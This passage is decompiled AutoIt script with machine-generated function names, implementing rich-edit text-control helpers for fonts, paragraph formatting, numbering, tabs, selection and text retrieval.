- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($ArgOpt01,">0,-1" )THEN RETURN SETERROR(0x03FD , 0 , 0 )
- IF $ArgOpt01<>- 1 THEN $ArgOpt01-= 1
- LOCAL $Local0055 =Fn0006($Arg00,$Var054C ,$ArgOpt01)
- IF $Local0055 =- 1 THEN RETURN SETERROR(0x03FE , 0 , 0 )
- RETURN $Local0055
- ENDFUNC
- Func Fn0129($Arg00)
- LOCAL $Local008E [ 3 ]=[ 0 , 0 ,""]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00A0 =DLLSTRUCTCREATE($Var051D )
- DLLSTRUCTSETDATA($Local00A0 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00A0 ))
- Fn017A($Arg00,$Local00A0 )
- IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0318 )=$Var0318 THEN $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local00A0 ,"szFaceName")
- IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0332 )=$Var0332 THEN $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local00A0 ,"yHeight" )/0x0014
- IF BITAND(DLLSTRUCTGETDATA($Local00A0 ,"dwMask" ),$Var0310 )=$Var0310 THEN $Local008E [ 2 ]=DLLSTRUCTGETDATA($Local00A0 ,"bCharSet" )
- RETURN $Local008E
- ENDFUNC
- Func Fn012A($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local0017 =DLLSTRUCTCREATE($Var013C )
- Fn0006($Arg00,$Var054D , 0 ,$Local0017 , 0 ,"wparam" ,"struct*" )
- LOCAL $Local00A4 [ 4 ]
- $Local00A4 [ 0 ]=DLLSTRUCTGETDATA($Local0017 ,"Left" )
- $Local00A4 [ 1 ]=DLLSTRUCTGETDATA($Local0017 ,"Top" )
- $Local00A4 [ 2 ]=DLLSTRUCTGETDATA($Local0017 ,"Right" )
- $Local00A4 [ 3 ]=DLLSTRUCTGETDATA($Local0017 ,"Bottom" )
- RETURN $Local00A4
- ENDFUNC
- Func Fn012B($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- RETURN Fn0006($Arg00,$Var054E )
- ENDFUNC
- Func Fn012C($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01,">0,-1" )THEN RETURN SETERROR(0x0066 , 0 , 0 )
- LOCAL $Local00B2 =Fn0128($Arg00,$Arg01)
- LOCAL $Local0055 =Fn0006($Arg00,$Var054F ,$Local00B2 )
- RETURN $Local0055
- ENDFUNC
- Func Fn012D($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 , 0 )
- RETURN Fn0006($Arg00,$Var0204 , 0 ,$Arg01)+ 1
- ENDFUNC
- Func Fn012E($Arg00,$ArgOpt01=TRUE )
- LOCAL CONST $Local00D5 [ 6 ]=["Unknown" ,"Typing" ,"Delete" ,"Drag and drop","Cut" ,"Paste" ]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
- LOCAL $Local00B3 =Fn0006($Arg00,$Var022E , 0 , 0 )
- IF $ArgOpt01 THEN
- RETURN $Local00D5 [$Local00B3 ]
- ELSE
- RETURN $Local00B3
- ENDIF
- ENDFUNC
- Func Fn012F($Arg00,$ArgOpt01=TRUE )
- LOCAL CONST $Local00D5 [ 6 ]=["Unknown" ,"Typing" ,"Delete" ,"Drag and drop","Cut" ,"Paste" ]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,"")
- LOCAL $Local00B3 =Fn0006($Arg00,$Var023E , 0 , 0 )
- IF $ArgOpt01 THEN
- RETURN $Local00D5 [$Local00B3 ]
- ELSE
- RETURN $Local00B3
- ENDIF
- ENDFUNC
- Func Fn0130($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- RETURN Fn0006($Arg00,$Var0550 )+ 1
- ENDFUNC
- Func Fn0131($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 , 2 )
- LOCAL $Local00B5 =DLLSTRUCTGETDATA($Local00B4 , 8 )
- LOCAL $Local00A7 =""
- SWITCH ($Local00B5 )
- CASE $Var0390
- $Local00A7 ="l"
- CASE $Var0394
- $Local00A7 ="c"
- CASE $Var0392
- $Local00A7 ="r"
- CASE $Var0396
- $Local00A7 ="j"
- CASE $Var0398
- $Local00A7 ="w"
- ENDSWITCH
- $Local00A7 &=";" &Fn0177($Arg00,$Local00A1 ,$Var039E )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0132($Arg00)
- LOCAL ENUM $Var0551 = 0 ,$Var0552 ,$Var0553
- LOCAL CONST $Local00C2 [ 9 ][ 3 ]=[["fpg" ,$Var03D0 ,FALSE ],["hyp" ,$Var03D6 ,TRUE ],["kpt" ,$Var03CC ,FALSE ],["kpn" ,$Var03CE ,FALSE ],["pwo" ,$Var03D4 ,FALSE ],["r2l" ,$Var03CA ,FALSE ],["row" ,$Var039A ,FALSE ],["sbs" ,$Var03D8 ,FALSE ],["sln" ,$Var03D2 ,FALSE ]]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A2 =DLLSTRUCTGETDATA($Local00B4 ,"wEffects" )
- LOCAL $Local00A3 ="",$Var0546
- FOR $Local00EB = 0 TO UBOUND($Local00C2 , 1 )- 1
- $Local00A3 &=$Local00C2 [$Local00EB ][$Var0551 ]
- IF BITAND($Local00A2 ,$Local00C2 [$Local00EB ][$Var0552 ])=$Local00C2 [$Local00EB ][$Var0552 ]THEN
- $Var0546 =Fn0102($Local00C2 [$Local00EB ][$Var0553 ],"-" ,"+" )
- ELSE
- $Var0546 =Fn0102($Local00C2 [$Local00EB ][$Var0553 ],"+" ,"-" )
- ENDIF
- $Local00A3 &=$Var0546 &";"
- NEXT
- $Local00A3 &=Fn0102(Fn0147($Arg00),"f" ,"c" )
- RETURN $Local00A3
- ENDFUNC
- Func Fn0133($Arg00)
- LOCAL CONST $Var0554 [ 6 ][ 2 ]=[["l" , 1 ],["r" , 2 ],["t" , 4 ],["b" , 8 ],["i" ,0x0010 ],["o" ,0x0020 ]]
- LOCAL CONST $Var0555 [0x000C ]=["none" , .75 , 1.5 , 2.25 , 3 , 4.5 , 6 ,".75d" ,"1.5d" ,"2.25d" ,".75g" ,".75gd" ]
- LOCAL CONST $Var0556 ="blk;blu;cyn;grn;mag;red;yel;whi;dbl;dgn;dmg;drd;dyl;dgy;lgy;"
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 , 2 )
- LOCAL $Local00B6 =DLLSTRUCTGETDATA($Local00B4 ,0x0016 )
- LOCAL $Local00B7 =DLLSTRUCTGETDATA($Local00B4 ,0x0018 )
- LOCAL $Local00A7 =""
- FOR $Local00EB = 0 TO UBOUND($Var0554 , 1 )- 1
- IF BITAND($Local00B7 ,$Var0554 [$Local00EB ][ 1 ])THEN $Local00A7 &=$Var0554 [$Local00EB ][ 0 ]
- NEXT
- $Local00A7 &=";"
- $Local00A7 &=$Var0555 [BITSHIFT(BITAND($Local00B7 ,0x0F00 ), 8 )]
- $Local00A7 &=";"
- IF BITAND($Local00B7 ,0x0040 )THEN
- $Local00A7 &="aut"
- ELSE
- $Local00A7 &=STRINGMID($Var0556 ,BITSHIFT(BITAND($Local00B7 ,0xF000 ),0x000C )* 4 + 1 , 3 )
- ENDIF
- $Local00A7 &=";"
- $Local00A7 &=Fn0175($Local00B6 )&";"
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03A6 )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0134($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 ,"dwMask" ,BITOR($Var03AA ,$Var03AC ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
- LOCAL $Local00B8 =DLLSTRUCTGETDATA($Local00B4 ,"dxStartIndent")
- LOCAL $Local00B9 =DLLSTRUCTGETDATA($Local00B4 ,"dxOffset" )
- LOCAL $Local00BA =DLLSTRUCTGETDATA($Local00B4 ,"dxRightIndent")
- LOCAL $Local00BB =Fn0175($Local00B8 +$Local00B9 )
- LOCAL $Local00BC =Fn0175(-$Local00B9 )
- LOCAL $Local00BD =Fn0175($Local00BA )
- LOCAL $Local0055 =$Local00BB &";" &$Local00BD &";" &$Local00BC &";" &Fn0177($Arg00,$Local00A1 ,$Var03AA )
- RETURN $Local0055
- ENDFUNC
- Func Fn0135($Arg00)
- LOCAL CONST $Var0557 [ 7 ][ 2 ]=[[0x03E8 ,"m" ],[0x01F4 ,"d" ],[0x0064 ,"c" ],[0x0032 ,"l" ],[ 10 ,"x" ],[ 5 ,"v" ],[ 1 ,"i" ]]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- DLLSTRUCTSETDATA($Local00B4 , 2 ,BITOR($Var039C ,$Var03A4 ,$Var03A2 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
- LOCAL $Local00BE =DLLSTRUCTGETDATA($Local00B4 ,"wNumbering")
- LOCAL $Local00BF =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingStart")
- LOCAL $Local00C0 =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingStyle")
- LOCAL $Local00C1 =DLLSTRUCTGETDATA($Local00B4 ,"wNumberingTab")
- LOCAL $Local00A7 =""
- SWITCH $Local00BE
- CASE 0
- $Local00A7 =""
- CASE 1
- $Local00A7 ="."
- CASE 2
- $Local00A7 =$Local00BF
- CASE 3
- $Local00A7 =CHR(ASC("a" )+$Local00BF - 1 )
- CASE 4
- $Local00A7 =CHR(ASC("a" )+$Local00BF - 1 )
- CASE 5 , 6
- FOR $Local00EB = 0 TO UBOUND($Var0557 , 1 )- 2 STEP 2
- FOR $Var0558 =$Local00EB TO $Local00EB + 1
- WHILE $Local00BF >=$Var0557 [$Var0558 ][ 0 ]
- $Local00A7 &=$Var0557 [$Var0558 ][ 1 ]
- $Local00BF -=$Var0557 [$Var0558 ][ 0 ]
- WEND
- IF $Local00BF =$Var0557 [$Var0558 ][ 0 ]- 1 THEN
- $Local00A7 &=$Var0557 [$Local00EB + 2 ][ 1 ]&$Var0557 [$Var0558 ][ 1 ]
- $Local00BF -=$Var0557 [$Var0558 ][ 0 ]-$Var0557 [$Local00EB + 2 ][ 0 ]
- ENDIF
- NEXT
- NEXT
- WHILE $Local00BF > 0
- $Local00A7 &="i"
- $Local00BF -= 1
- WEND
- IF $Local00BE = 6 THEN $Local00A7 =STRINGUPPER($Local00A7 )
- ENDSWITCH
- IF $Local00BE > 1 THEN
- SWITCH $Local00C0
- CASE 0
- $Local00A7 &=")"
- CASE 0x0100
- $Local00A7 ="(" &$Local00A7 &")"
- CASE 0x0200
- $Local00A7 &="."
- CASE 0x0300
- ENDSWITCH
- ENDIF
- LOCAL $Local00C2 =Fn0129($Arg00)
- LOCAL $Local00C3 =$Local00C2 [ 0 ]
- LOCAL $Local00C4 =ROUND($Local00C1 /($Local00C3 *0x0014 ), 0 )
- FOR $Local00EB = 1 TO $Local00C4
- $Local00A7 &=" "
- NEXT
- $Local00A7 &=";"
- $Local00A7 &=Fn0102($Local00BE = 5 OR $Local00BE = 6 ,"Roman;" ,";" )
- $Local00A7 &=Fn0175($Local00C1 )&";"
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,BITOR($Var039C ,$Var03A4 ,$Var03A2 ))
- RETURN $Local00A7
- ENDFUNC
- Func Fn0136($Arg00)
- LOCAL CONST $Var0559 [0x000D ]=["non" ,"dhz" ,"dvt" ,"ddd" ,"dud" ,"dgr" ,"dtr" ,"lhz" ,"lrt" ,"ldd" ,"lud" ,"lgr" ,"ltr" ]
- LOCAL CONST $Var055A [0x0010 ]=["blk" ,"blu" ,"cyn" ,"grn" ,"mag" ,"red" ,"yel" ,"whi" ,"dbl" ,"dgn" ,"dmg" ,"drd" ,"dyl" ,"dgy" ,"lgy" ]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 , 1 ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
- LOCAL $Local00C5 =DLLSTRUCTGETDATA($Local00B4 ,"wShadingWeight")
- LOCAL $Local00C6 =DLLSTRUCTGETDATA($Local00B4 ,"wShadingStyle")
- LOCAL $Local00A7 =$Local00C5 &";"
- LOCAL $Local001C =BITAND($Local00C6 ,0x000F )
- $Local00A7 &=$Var0559 [$Local001C ]&";"
- $Local001C =BITSHIFT(BITAND($Local00C6 ,0x00F0 ), 4 )
- $Local00A7 &=$Var055A [$Local001C ]&";"
- $Local001C =BITSHIFT(BITAND($Local00C6 ,0x0F00 ), 8 )
- $Local00A7 &=$Var055A [$Local001C ]&";"
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03DA )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0137($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var0530 )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00C7 =DLLSTRUCTGETDATA($Local00B4 ,"dyLineSpacing")
- LOCAL $Local00C8 =DLLSTRUCTGETDATA($Local00B4 ,"bLineSpacingRule")
- LOCAL $Local00A7 =""
- SWITCH $Local00C8
- CASE 0
- $Local00A7 ="1 line;"
- CASE 1
- $Local00A7 ="1.5 lines;"
- CASE 2
- $Local00A7 ="2 lines;"
- CASE 3 , 4
- $Local00A7 =Fn0175($Local00C7 )&";"
- CASE 5
- $Local00A7 =STRINGFORMAT("%.2f" ,$Local00C7 /0x0014 )&" lines;"
- ENDSWITCH
- LOCAL $Local00A1 = 0
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03AE )&";"
- LOCAL $Local00C9 =DLLSTRUCTGETDATA($Local00B4 ,"dySpaceBefore")
- $Local00A7 &=Fn0175($Local00C9 )&";"
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03A0 )&";"
- LOCAL $Local00CA =DLLSTRUCTGETDATA($Local00B4 ,"dySPaceAfter")
- $Local00A7 &=Fn0175($Local00CA )&";"
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03B0 )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0138($Arg00)
- LOCAL CONST $Var055B [ 5 ]=["l" ,"c" ,"r" ,"d" ,"b" ],$Var055C [ 6 ]=[" " ,"." ,"-" ,"_" ,"t" ,"=" ]
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,"")
- LOCAL $Local00B4 =DLLSTRUCTCREATE($Var052D )
- DLLSTRUCTSETDATA($Local00B4 ,"cbSize" ,DLLSTRUCTGETSIZE($Local00B4 ))
- Fn017B($Arg00,$Local00B4 )
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,"")
- LOCAL $Local00A1 =DLLSTRUCTGETDATA($Local00B4 ,"dwMask" )
- LOCAL $Local00CB =DLLSTRUCTGETDATA($Local00B4 ,"cTabCount" )
- LOCAL $Local00A7 =$Local00CB &";"
- LOCAL $Local001C ,$Var055D
- FOR $Local00EB = 1 TO $Local00CB
- $Local001C =DLLSTRUCTGETDATA($Local00B4 ,"rgxTabs" ,$Local00EB )
- $Local00A7 &=Fn0175(BITAND($Local001C ,0x000FFFFF ))
- $Var055D =BITAND(BITSHIFT($Local001C ,0x0018 ),0x000F )
- $Local00A7 &=$Var055B [$Var055D ]
- $Var055D =BITAND(BITSHIFT($Local001C ,0x001C ),0x000F )
- $Local00A7 &=$Var055C [$Var055D ]&";"
- NEXT
- $Local00A7 &=Fn0177($Arg00,$Local00A1 ,$Var03B6 )
- RETURN $Local00A7
- ENDFUNC
- Func Fn0139($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00CC =Fn0006($Arg00,$Var055E )
- RETURN Fn0102($Local00CC = 0 ,"",CHR($Local00CC ))
- ENDFUNC
- Func Fn013A($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
- Fn0006($Arg00,$Var0230 , 0 ,$Local0030 , 0 ,"wparam" ,"struct*" )
- LOCAL $Local008E [ 2 ]
- $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local0030 ,"x" )
- $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local0030 ,"y" )
- RETURN $Local008E
- ENDFUNC
- Func Fn013B($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00CD =DLLSTRUCTCREATE($Var0523 )
- Fn0006($Arg00,$Var0200 , 0 ,$Local00CD , 0 ,"wparam" ,"struct*" )
- LOCAL $Local008E [ 2 ]
- $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local00CD , 1 )
- $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local00CD , 2 )
- RETURN $Local008E
- ENDFUNC
- Func Fn013C($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- LOCAL $Local00CE =Fn013B($Arg00)
- IF $Local00CE [ 0 ]=$Local00CE [ 1 ]THEN RETURN SETERROR(- 1 , 0 , 0 )
- Fn0006($Arg00,$Var0543 ,- 1 , 0 )
- LOCAL $Local00CF =Fn013B($Arg00)
- LOCAL $Local008E [ 2 ]
- IF $Local00CE [ 0 ]=$Local00CF [ 0 ]THEN
- $Local008E [ 0 ]=$Local00CE [ 1 ]
- $Local008E [ 1 ]=$Local00CE [ 0 ]
- ELSE
- $Local008E =$Local00CE
- ENDIF
- Fn0006($Arg00,$Var0543 ,$Local00CE [ 0 ],$Local00CE [ 1 ])
- Fn00AF($Arg00)
- RETURN $Local008E
- ENDFUNC
- Func Fn013D($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,- 1 )
- LOCAL $Local00CE =Fn013B($Arg00)
- LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &$Local00CE [ 1 ]-$Local00CE [ 0 ]+ 1 &"]" )
- Fn0006($Arg00,$Var0232 , 0 ,$Local009C , 0 ,"wparam" ,"struct*" )
- RETURN DLLSTRUCTGETDATA($Local009C , 1 )
- ENDFUNC
- Func Fn013E()
- SWITCH $Var04B9
- CASE 0x05A0
- RETURN "in"
- CASE 0x0237
- RETURN "cm"
- CASE 56.7
- RETURN "mm"
- CASE 0x0014
- RETURN "pt"
- CASE 1
- RETURN "tw"
- ENDSWITCH
- ENDFUNC
- Func Fn013F($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">0,-1" )THEN RETURN SETERROR(0x03FD , 0 ,FALSE )
- IF $Arg01>Fn012B($Arg00)THEN RETURN SETERROR(0x03FE , 0 ,FALSE )
- LOCAL $Local009B =Fn012C($Arg00,$Arg01)
- IF $Local009B = 0 THEN RETURN ""
- LOCAL $Local000C =DLLSTRUCTCREATE("short Len;wchar Text["&$Local009B + 2 &"]" )
- DLLSTRUCTSETDATA($Local000C ,"Len" ,$Local009B + 2 )
- IF $Arg01<>- 1 THEN $Arg01-= 1
- LOCAL $Local0055 =Fn0006($Arg00,$Var055F ,$Arg01,$Local000C , 10 ,"wparam" ,"struct*" )
- IF $Local0055 = 0 THEN RETURN SETERROR(0x02BC , 0 ,FALSE )
- LOCAL $Local00D0 =DLLSTRUCTCREATE("wchar Text["&$Local009B + 1 &"]" ,DLLSTRUCTGETPTR($Local000C ))
- RETURN STRINGLEFT(DLLSTRUCTGETDATA($Local00D0 ,"Text" ),$Local009B )
- ENDFUNC
- Func Fn0140($Arg00,$Arg01,$Arg02)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- IF NOT Fn0176($Arg02,">=0,-1" )THEN RETURN SETERROR(0x0407 , 0 ,FALSE )
- IF NOT ($Arg02>$Arg01 OR $Arg02=- 1 )THEN RETURN SETERROR(0x0408 , 0 ,FALSE )
- LOCAL $Local009B =Fn0126($Arg00)
- LOCAL $Local009C =DLLSTRUCTCREATE("wchar[" &($Local009B + 4 )&"]" )
- LOCAL $Local00D1 =DLLSTRUCTCREATE($Var0536 )
- DLLSTRUCTSETDATA($Local00D1 , 1 ,$Arg01)
- DLLSTRUCTSETDATA($Local00D1 , 2 ,$Arg02)
- DLLSTRUCTSETDATA($Local00D1 , 3 ,DLLSTRUCTGETPTR($Local009C ))
- Fn0006($Arg00,$Var023A , 0 ,$Local00D1 , 0 ,"wparam" ,"struct*" )
- RETURN DLLSTRUCTGETDATA($Local009C , 1 )
- ENDFUNC
- Func Fn0141()
- RETURN $Var04B8
- ENDFUNC
- Func Fn0142($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 , 0 )
- IF NOT Fn0176($Arg01,">=0" )THEN RETURN SETERROR(0x03FD , 0 , 0 )
- IF $Arg01>Fn0126($Arg00)THEN RETURN SETERROR(0x03FE , 0 , 0 )
- LOCAL $Local0030 =DLLSTRUCTCREATE($Var010E )
- Fn0006($Arg00,$Var0560 ,$Local0030 ,$Arg01, 0 ,"struct*" ,"lparam" )
- LOCAL $Local008E [ 2 ]
- $Local008E [ 0 ]=DLLSTRUCTGETDATA($Local0030 ,"X" )
- $Local008E [ 1 ]=DLLSTRUCTGETDATA($Local0030 ,"Y" )
- RETURN $Local008E
- ENDFUNC
- Func Fn0143($Arg00,$Arg01)
- Fn0167($Arg00,$Arg01,$Arg01)
- IF @ERROR THEN RETURN SETERROR(@ERROR, 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0144($Arg00,$ArgOpt01=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt01)THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- Fn0006($Arg00,$Var0246 ,$ArgOpt01, 0 )
- Fn00AF($Arg00)
- ENDFUNC
- Func Fn0145($Arg00,$Arg01)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF $Arg01="" THEN RETURN SETERROR(0x0066 , 0 ,FALSE )
- LOCAL $Local0096 =DLLSTRUCTCREATE($Var0534 )
- DLLSTRUCTSETDATA($Local0096 , 1 ,$Var02E2 )
- Fn0118($Arg00)
- LOCAL $Local0055
- IF STRINGLEFT($Arg01, 5 )<>"{\rtf" AND STRINGLEFT($Arg01, 5 )<>"{urtf" THEN
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0302 )
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"wstr" )
- ELSE
- DLLSTRUCTSETDATA($Local0096 , 2 ,$Var0300 )
- $Local0055 =Fn0006($Arg00,$Var0274 ,$Local0096 ,$Arg01, 0 ,"struct*" ,"STR" )
- ENDIF
- IF NOT $Local0055 THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- RETURN TRUE
- ENDFUNC
- Func Fn0146($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var0561 )<> 0
- ENDFUNC
- Func Fn0147($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local00CD =DLLSTRUCTCREATE($Var0523 )
- Fn0006($Arg00,$Var0200 , 0 ,$Local00CD , 0 ,"wparam" ,"struct*" )
- RETURN DLLSTRUCTGETDATA($Local00CD , 2 )<>DLLSTRUCTGETDATA($Local00CD , 1 )
- ENDFUNC
- Func Fn0148($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var050D , 0 , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn0149($Arg00,$ArgOpt01=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- LOCAL $Local001C =Fn0102($ArgOpt01,$Var04BD ,$Var04BC )
- Fn0006($Arg00,$Var0248 ,$Local001C , 0 )
- RETURN TRUE
- ENDFUNC
- Func Fn014A($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var050F ,FALSE , 0 )
- ENDFUNC
- Func Fn014B($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- RETURN Fn0006($Arg00,$Var024C , 0 , 0 )<> 0
- ENDFUNC
- Func Fn014C($Arg00,$Arg01,$ArgOpt02=TRUE )
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- IF NOT ISBOOL($ArgOpt02)THEN RETURN SETERROR(0x0067 , 0 ,FALSE )
- IF NOT Fn0147($Arg00)THEN RETURN SETERROR(- 1 , 0 ,FALSE )
- LOCAL $Local009C =DLLSTRUCTCREATE("wchar Text["&STRINGLEN($Arg01)+ 1 &"]" )
- DLLSTRUCTSETDATA($Local009C ,"Text" ,$Arg01)
- IF Fn007B($Arg00,$Var04CB )THEN
- Fn0006($Arg00,$Var0562 ,$ArgOpt02,$Local009C , 0 ,"wparam" ,"struct*" )
- ELSE
- LOCAL $Local00D2 =DLLSTRUCTGETSIZE($Local009C )
- LOCAL $Var0563
- LOCAL $Local006D =Fn00E2($Arg00,$Local00D2 ,$Var0563 )
- Fn00E5($Var0563 ,$Local009C )
- Fn0006($Arg00,$Var0562 ,$ArgOpt02,$Local006D , 0 ,"wparam" ,"ptr" )
- Fn00DC($Var0563 )
- ENDIF
- RETURN TRUE
- ENDFUNC
- Func Fn014D($Arg00)
- IF NOT Fn007D($Arg00,$Var04B6 )THEN RETURN SETERROR(0x0065 , 0 ,FALSE )
- Fn0006($Arg00,$Var050F ,TRUE , 0 )
- RETURN Fn0080($Arg00)
- ENDFUNC
